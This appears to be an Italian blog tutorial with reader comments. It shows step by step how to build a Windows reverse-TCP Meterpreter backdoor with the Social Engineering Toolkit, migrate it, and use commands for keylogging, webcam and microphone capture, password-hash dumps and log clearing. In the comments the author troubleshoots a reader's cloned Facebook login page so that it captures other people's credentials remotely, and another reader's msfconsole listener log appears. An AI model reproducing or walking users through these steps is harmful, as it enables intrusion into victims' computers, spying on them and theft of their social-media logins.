ATTENZIONE:
Danneggiare un sistema informatico (anche da remoto) rappresenta un reato penale. Le informazioni presenti in quest'articolo vanno utilizzate solo per testare/verificare sistemi di cui si è titolari. Declino ogni responsabilità civile e penale derivante da un utilizzo non legale delle informazioni presentate in questo articolo a solo scopo didattico.
- La prima operazione da effettuare è quella di avviare SET: da terminale eseguire il comando setoolkit oppure, dall'interfaccia grafica di Kali Linux (Versione 2016.1), cliccare su Applications>Social Engineering Tools>Social Engineering Toolkit.
FIG 1 - Social Engineering Tools - Dal menu che appare selezionare l'opzione 1) Social-Engineering Attacks
FIG 2 - Social-Engineering Attacks - Selezionare l'opzione 4) Create a Payload and Listener.
FIG 3 - Create a Payload and Listener - Selezionare 2) Windows Reverse_TCP Meterpreter.
FIG 4 - Windows Reverse_TCP Meterpreter - Indicare l'indirizzo IP che il payload deve contattare una volta che viene eseguito dalla vittima (indirizzo IP di chi attacca).
FIG 5 - IP Address - Specificare la porta del listener (in genere 443) confermando con invio. Verrà creato un eseguibile chiamato payload.exe (in /root/.usr/payload.exe) che consente di aprire una backdoor sulla workstation della vittima.
FIG 6 - Porta su cui attendere la comunicazione del payload
FIG 7 - Percorso del payload.exe da eseguire sulla macchina della vittima - A questo punto viene richiesto se si intende avviare il listener sulla macchina di chi sta eseguendo l'attacco. Digitare yes seguito da invio per avviare la msfconsole.
FIG 8 - Avvio del listener - Una volta che msfconsole è stata avviata non resta che attendere che il file payload.exe venga eseguito sulla macchina della vittima e verrà aperta una sessione di Meterpreter.
FIG 9 - Sessione Meterpreter - Digitare il comando sessions -i 1 dove 1 rappresenta il numero della sessione che si intende selezionare (in FIG 9 è possibile vedere il numero della sessione nella dicitura session 1 opened)
FIG 10 - Attivare la sessione - Per fare in modo che meterpreter rimanga aperto è necessario migrare il payload su un altro processo. Per eseguire questa operazione è necessario disporre del PDI (process ID) di un altro processo. Usare il comando ps per visualizzare i processi attualmente in esecuzione sulla macchina vittima. Una volta individuato il PID su cui vogliamo migrare utilizziamo il comando
migrate <PID del processo>
ad es
migrate 4878
Possiamo riavviare la postazione, trasferire file, terminare processi, prendere il controllo della webcam/microfono, ecc.
Di seguito un elenco dei comandi che è possibile eseguire:
Core Commands
=============
Command Description
------- -----------
? Help menu
background Backgrounds the current session
bgkill Kills a background meterpreter script
bglist Lists running background scripts
bgrun Executes a meterpreter script as a background thread
channel Displays information or control active channels
close Closes a channel
disable_unicode_encoding Disables encoding of unicode strings
enable_unicode_encoding Enables encoding of unicode strings
exit Terminate the meterpreter session
get_timeouts Get the current session timeout values
help Help menu
info Displays information about a Post module
irb Drop into irb scripting mode
load Load one or more meterpreter extensions
machine_id Get the MSF ID of the machine attached to the session
migrate Migrate the server to another process
quit Terminate the meterpreter session
read Reads data from a channel
resource Run the commands stored in a file
run Executes a meterpreter script or Post module
set_timeouts Set the current session timeout values
sleep Force Meterpreter to go quiet, then re-establish session.
transport Change the current transport mechanism
use Deprecated alias for 'load'
uuid Get the UUID for the current session
write Writes data to a channel
Stdapi: File system Commands
============================
Command Description
------- -----------
cat Read the contents of a file to the screen
cd Change directory
dir List files (alias for ls)
download Download a file or directory
edit Edit a file
getlwd Print local working directory
getwd Print working directory
lcd Change local working directory
lpwd Print local working directory
ls List files
mkdir Make directory
mv Move source to destination
pwd Print working directory
rm Delete the specified file
rmdir Remove directory
search Search for files
show_mount List all mount points/logical drives
upload Upload a file or directory
Stdapi: Networking Commands
===========================
Command Description
------- -----------
arp Display the host ARP cache
getproxy Display the current proxy configuration
ifconfig Display interfaces
ipconfig Display interfaces
netstat Display the network connections
portfwd Forward a local port to a remote service
route View and modify the routing table
Stdapi: System Commands
=======================
Command Description
------- -----------
clearev Clear the event log
drop_token Relinquishes any active impersonation token.
execute Execute a command
getenv Get one or more environment variable values
getpid Get the current process identifier
getprivs Attempt to enable all privileges available to the current process
getsid Get the SID of the user that the server is running as
getuid Get the user that the server is running as
kill Terminate a process
ps List running processes
reboot Reboots the remote computer
reg Modify and interact with the remote registry
rev2self Calls RevertToSelf() on the remote machine
shell Drop into a system command shell
shutdown Shuts down the remote computer
steal_token Attempts to steal an impersonation token from the target process
suspend Suspends or resumes a list of processes
sysinfo Gets information about the remote system, such as OS
Stdapi: User interface Commands
===============================
Command Description
------- -----------
enumdesktops List all accessible desktops and window stations
getdesktop Get the current meterpreter desktop
idletime Returns the number of seconds the remote user has been idle
keyscan_dump Dump the keystroke buffer
keyscan_start Start capturing keystrokes
keyscan_stop Stop capturing keystrokes
screenshot Grab a screenshot of the interactive desktop
setdesktop Change the meterpreters current desktop
uictl Control some of the user interface components
Stdapi: Webcam Commands
=======================
Command Description
------- -----------
record_mic Record audio from the default microphone for X seconds
webcam_chat Start a video chat
webcam_list List webcams
webcam_snap Take a snapshot from the specified webcam
webcam_stream Play a video stream from the specified webcam
Priv: Elevate Commands
======================
Command Description
------- -----------
getsystem Attempt to elevate your privilege to that of local system.
Priv: Password database Commands
================================
Command Description
------- -----------
hashdump Dumps the contents of the SAM database
Priv: Timestomp Commands
========================
Command Description
------- -----------
timestomp Manipulate file MACE attributes
ma funziona da remoto(a distanza)?
RispondiEliminaSi, funziona anche a distanza con opportuni accorgimenti. Ad es. bisogna utilizzare il proprio indirizzo pubblico (nel caso in cui non si disponga di un'IP fisso bisogna utilizzare appositi servizi), aprire le porte sul proprio router e impostare un portforwarding
EliminaCiao, ho installa SET su windows, e clonando i repository su github, ma ho sempre errori relativi a metasploit, ti chiedo dunque se per utilizzarlo al meglio, mi conviene ripartire l'HDD tra windows e linux per utilizzare al meglio SET, oppure posso utilizzarlo tranquillamente anche tramite windows? grazie
RispondiEliminaCiao. In passato anche io ho avuto diversi problemi con la versione di Windows dovuti principalmente alle versioni non aggiornate del tool e dei framework. Personalmente in questi casi preferisco operare in ambiente Linux, in particolare con Kali linux che, oltre ad integrare SET, mette a disposizione moltissimi strumenti utili per il penetration testing. Con pochi comandi (vedi http://giovannilubrano.blogspot.it/2015/07/kali-linux-messaggio-something-went.html) è possibile aggiornare sia la distribuzione che SET all'ultima versione. Puoi ripartizionare il disco in modo da avere in dual boot Windows e Linux, installare Linux in una Virtual machine oppure, con pochi euro, puoi procurarti una pendrive usb e installarci su Kali Linux rendendola bootable. Io ho preferito quest'ultima opzione che mi consente di avere Kali Linux sempre con me e di poter avviarla da un qualsiasi PC.
Eliminaciao, ho installato set su windows, clonando i repositry su github, ma continuo ad avere problemi con metasploit, come posso risolvere?
RispondiEliminaCiao. In passato anche io ho avuto diversi problemi con la versione di Windows dovuti principalmente alle versioni non aggiornate del tool e dei framework. Personalmente in questi casi preferisco operare in ambiente Linux, in particolare con Kali linux che, oltre ad integrare SET, mette a disposizione moltissimi strumenti utili per il penetration testing. Con pochi comandi (vedi http://giovannilubrano.blogspot.it/2015/07/kali-linux-messaggio-something-went.html) è possibile aggiornare sia la distribuzione che SET all'ultima versione. Puoi ripartizionare il disco in modo da avere in dual boot Windows e Linux, installare Linux in una Virtual machine oppure, con pochi euro, puoi procurarti una pendrive usb e installarci su Kali Linux rendendola bootable. Io ho preferito quest'ultima opzione che mi consente di avere Kali Linux sempre con me e di poter avviarla da un qualsiasi PC.
EliminaCiao, il mio problema, ho fatto la prova in remoto con il pc di un amico, che quando ho aperto la porta 80 sul mio pc, e utilizzato no-ip per rendere l'ip statico, non riesco a connettermi nel mio pc in remoto.
RispondiEliminaO meglio, ho creato un sito clone, nel senso che l'ha fatto set, una delle tante impostazioni, del login di facebook. Dall'altro pc mi compare la login di fb, inserendo l'ip del mio pc, quindi vuol dire che il mio pc in questo caso sta fungendo da web server, ma una volta che inserisco i dati che dovrebbero essere catturati dal pc dal terminale di set, ecco che si blocca tutto, ovvero classica schermata: impossibile raggiungere il sito, connessione negata.. Infatti poi controllando sul mio pc i dati non vengono catturati.
Cosa che in locale funziona perfettamente.
Gentilmente sapresti indicarmi quale potrebbe essere il problema?
Per adesso ti ringrazio e saluto,
ciao, Andrea
Quando la vittima inserisce le credenziali dovrebbe essere richiamata la pagina post.php che scrive le credenziali catturare e dirotta la vittima sulla pagina di facebook vera. Se si riceve un messaggio di accesso negato è possibile che ci sia un problema sui permessi sulla cartella /var/www (percorso dove dovrebbe essere creato il file contenente le credenziali rubate). Verifica i permessi su tale cartella e permetti la scrittura a chiunque.
EliminaCiao Giovanni,
Eliminavoglio scusarmi per il ritardo nella mia risposta, ho avuto un pò di problemi.
Volevo ringraziarti, prima di ogni cosa.
Ho fatto la prova con il pc di un amico mi sono collegato al mio con la porta 80 aperta, e ovviamente con set in funzione per catturare i dati, il mio ip è diventato statico con no-ip.
Il problema, come ti dicevo, che comunque riesco a vedere dal pc del mio amico la pagina clonata sul mio pc in remoto, ma nel momento che inserisco i dati nel form e invio, compare pagina non disponibile, come se non ci fosse la linea, non è interessante, mentre l'importante che set poi riesca a catturare i dati, cosa che non avviene. Tutto questo in remoto funziona perfettamente.
Cosa potrebbe essere?
Per adesso ti saluto e ringrazio.
Ciao
Innanzitutto assicurati di aver installato l'ultima versione di SET. Puoi aggiornarlo seguendo le istruzioni che ho indicato qui https://giovannilubrano.blogspot.it/2015/07/kali-linux-messaggio-something-went.html.
EliminaAssicurati di impostare il portforwarding sul tuo router in particolare della porta 80 e 443.
Assicurati che siano impostati i permessi corretti sulla directory /var/www/html.
All'interno della directory /var/www/html dovresti trovare 2 file: index.html (contentente la pagina clone) e post.php (che contiene le istruzioni per scrivere l'utenza e la password catturata all'interno di un file di testo di nome harvester). Apri il file index.html con un editor e cerca la stringa post.php. Dovresti trovare qualcosa come http://192.168.1.14/post.php ovviamente al posto dell'ip 192.168.1.14 assicurati che ci sia il tuo ip pubblico
ciao,ho praticamente lo stesso problema, mi spiego: nel momento in cui clono una pagina esempio quella di facebook, se provo in locale il suo funzionamento, funge a meraviglia, il problema sorge nel momento in cui lo voglio provare su una macchina diversa, il browesr mi dice che il server non è raggiungibile. devo attivare apache? oppure devo effettuare qualche altra configurazione?
RispondiEliminagrazie in anticipo,
Dario
L'operazione che stai eseguendo è diversa da quello che è indicata in questo articolo. Stai creando un clone di una pagina per eseguire un attacco tramite phishing. Su una macchina diversa dici che non funziona, ma la macchina si trova sulla stessa rete locale? Se la macchina si trova all'esterno della rete locale allora è necessario specificare il tuo indirizzo IP esterno e procedere con il portforwarding sul router.
Eliminascusami ma a me esce bad config che vuol dire...
RispondiEliminaAggiorna il sistema e SET seguendo i passaggi indicati in http://giovannilubrano.blogspot.it/2015/07/kali-linux-messaggio-something-went.html
EliminaSe il problema persiste dimmi in che punto visualizzi il messaggio di errore
MI ESCE QUESTO..
Eliminaset:payloads> Do you want to start the payload and listener now? (yes/no):yes
[*] Launching msfconsole, this could take a few to load. Be patient...
______________________________________________________________________________
| |
| 3Kom SuperHack II Logon |
|______________________________________________________________________________|
| |
| |
| |
| User Name: [ security ] |
| |
| Password: [ ] |
| |
| |
| |
| [ OK ] |
|______________________________________________________________________________|
| |
| http://metasploit.com |
|______________________________________________________________________________|
Taking notes in notepad? Have Metasploit Pro track & report
your progress and findings -- learn more on http://rapid7.com/metasploit
=[ metasploit v4.12.22-dev ]
+ -- --=[ 1577 exploits - 906 auxiliary - 272 post ]
+ -- --=[ 455 payloads - 39 encoders - 8 nops ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
[*] Processing /root/.set//meta_config for ERB directives.
resource (/root/.set//meta_config)> use multi/handler
resource (/root/.set//meta_config)> set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
resource (/root/.set//meta_config)> set LHOST 151.56.198.175
LHOST => 151.56.198.175
resource (/root/.set//meta_config)> set LPORT 443
LPORT => 443
resource (/root/.set//meta_config)> set ExitOnSession false
ExitOnSession => false
resource (/root/.set//meta_config)> exploit -j
[*] Exploit running as background job.
[-] Handler failed to bind to 151.56.198.175:443:- -
[*] Started reverse TCP handler on 0.0.0.0:443
[*] Starting the payload handler...
msf exploit(handler) >
Il messaggio indica che non riesce a connettersi alla porta 443 su 151.56.198.175. I motivi possono essere diversi.
Elimina- Assicurati che l'indirizzo IP sia corretto;
- Verifica di aver effettuato correttamente il port forwarding sul router;
- Verifica che non ci siano altri servizi in ascolto sulla porta 443, per farlo basta che lanci il comando netstat -an |grep LIST da una finestra terminale.
- Prova a cambiare porta.